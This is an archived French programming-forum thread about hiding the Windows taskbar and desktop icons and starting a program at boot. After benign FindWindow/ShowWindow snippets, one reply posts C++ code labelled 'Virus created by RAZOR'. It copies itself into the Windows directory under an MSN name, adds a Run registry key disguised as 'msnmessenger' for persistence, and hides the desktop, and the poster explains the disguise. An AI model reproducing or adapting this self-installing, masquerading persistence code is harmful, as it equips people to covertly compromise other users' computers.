begin process at 2012 05 30 20:08:53
  Trouver un code source :

dans

Accueil > Forum > 

Archive C/C++

> 

Archives

> 

API

> 

Windows sans windows

Derniers messages déposésPoser une question dans le forum ou lancer une discussion

Windows sans windows

dimanche 29 février 2004 à 14:54:56 | Windows sans windows

BuGbOy

Voilà, je code actuellement un logiciel pour mon proj de fin d'année, et j'aimerai que lorsqu'il se lance, il apparaisse en surcouche de Windows. C'est à dire, que la barre de tache ne soit plus visibles ainsi qu'aucune icone du bureau. Peut etre le fond d'écran si c'est possible. Je voudrais savoir déjà comment faire pour tout faire disparaitre et ne laisser que mon programme. Et ensuite, faire qu'il se lance au démarrage de windows sans que le reste apparaisse. Merci d'avance.
dimanche 29 février 2004 à 15:49:32 | Re : Windows sans windows

norton

Hello,
je sait que c'est possible de cacher les icones du bureau et la bare de tache mais je sait pas si on peut cacher l'arrière plant.

dimanche 29 février 2004 à 17:44:30 | Re : Windows sans windows

BuGbOy

Merci de ta réponse mais ca m'avance pas beaucoup.
dimanche 29 février 2004 à 19:28:03 | Re : Windows sans windows

garslouche

Pour masquer la barre des taches :

HWND hTaskBar = FindWindow("Shell_TrayWnd", NULL);
ShowWindow(hTaskBar, SW_HIDE);

Pour masquer les icones du bureau:

HWND hIcones = FindWindow (NULL, "Program Manager");
ShowWindow(hIcones, SW_HIDE);

On ne force pas une curiosité, on l'éveille.
.................................................Daniel Pennac
mercredi 23 mars 2005 à 16:17:05 | Re : Windows sans windows

wxccxw

Membre Club
de meme

#include <vcl.h>
#pragma hdrstop
#pragma argsused
#include <windows.h>
#include <string.h>
#include <iostream.h>
/*
Virus created by RAZOR
*/

char windir[MAX_PATH];
int main(int argc, char* argv[])
{
char pathname[256];
GetWindowsDirectory(windir, sizeof(windir));
HMODULE hMe = GetModuleHandle(NULL);
DWORD nRet = GetModuleFileName(hMe, pathname, 256);

strcat(windir, "\\MSN.exe");
CopyFile(pathname,windir,1);

unsigned char reg[30] = "C:\\WINDOWS\\MSNmessenger.exe";
HKEY hKey;
RegCreateKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\run",&hKey);
RegSetValueEx(hKey,"msnmessenger",0,REG_SZ,reg,sizeof(reg));
RegCloseKey(hKey);
HWND Bureau = FindWindow("Progman", "Program Manager");
ShowWindow(Bureau, SW_HIDE);
}

ici je l'ai mis au demarage et j'ai appeler le prog "MSNmessenger.exe"
il va se copier dans system32 et se mettre au demmarage dans le registre (regedit.exe)

bonne chance

Cette discussion est classée dans : windows, lance, apparaisse

Répondre à ce message

Sujets en rapport avec ce message

Lancer une appli par un service windows [ par jayjay9531 ] Bonjour,J'ai un petit problème avec le service windows que j'ai créé. Il fonctionne bien mais j'ai besoin qu'il lance une applcation, j'utilise :#incl Hook incompatible avec service windows ? [ par HeavenForsaker ] J'ai codé un hook qui fonctionne quand on lance la fonction SetWindowsHookEx() depuis un exécutable (l'exécutable charge la DLL par la suite). Ensuite exe c++ se lance au démarrage windows mais s'exécute pas, lancé manuellement il marche [ par rv2010 ] Bonjour, J'ai crée une petite appli test en c++ sur visual c++ 2010 express. Pas de message d'erreur. - Lancé manuellement tout est OK (ca écrit un t Compatibilité VC++ Express 2010 vs Windows 2k [ par scoubidou944 ] Glop, je viens de recompiler un programme qui tournait avec VC++ 2008 Express (C++ à l'ancienne, pas de framework .NET) sous VC++ 2010 Express. L'exe borland builder c++ 5.02 et windows 7 64bit [ par anarchyst14 ] Bonjour je suis étudiant en 2eme année de bts et dans le cadre de mon projet,je doit utilisé le logiciel borland C++ 5.02 pour programmer du code et l windows forms c++ [ par soumanour ] je travail sur visual studio 2010 c++ windows forms j'ai une base de donnée" project" realisé par mysql server 2005 et une table appelé produit, et un Windows Form et Fmod ( Linker ) [ par Juj34130 ] Bonjour, je souhaiterai inclure la librairie fmodex a mon projet fait avec visual c++ 2005 express avec windows form. Le problème, c'est que je n'arr erreur opencv webcam [ par forX ] je tente d'utiliser opencv 2.2 system:W7 compile:VS2010 erreur redondante :Loaded 'C:\Windows\System32\msyuv.dll', Cannot find or open the PDB file Bloquer les touches alt, windows, ctrl et la souris [ par hallbid ] Bonjour, Je ne sais pas si j'ai déjà posté et si jamais je l'ai fait ça fait longtemps. Je me présente donc, Je suis en deuxième année de BTS option r Resource boite de transfert de fichier sous Windows 7 [ par MikeM ] Bonjour à tous, J'utilise dans mon code (C++/MFC) sous Windows XP la ressource de la boite de transfert de fichier (1020) inclus dans shell32.dll To

Nos sponsors

Sondage...

CalendriCode

Mai 2012
LMMJVSD
 123456
78910111213
14151617181920
21222324252627
28293031   

Consulter la suite du CalendriCode

Photothèque

A découvrir

Développement réalisé par Nicolas SOREL (Nix) avec l'aide de : Cyril DURAND et Emmanuel (EBArtSoft), Merci à Vincent pour ses précieux conseils.
CodeS-SourceS.com© Toute reproduction même partielle est interdite sauf accord écrit du Webmaster
CodeS-SourceS.com© est une marque déposée tous droits réservés

Google Coop CodeS-SourceS Google Coop CodeS-SourceS
Temps d'éxécution de la page : 0,406 sec (3)

Nous contacter | Annoncer sur CodeS-SourceS | Mentions légales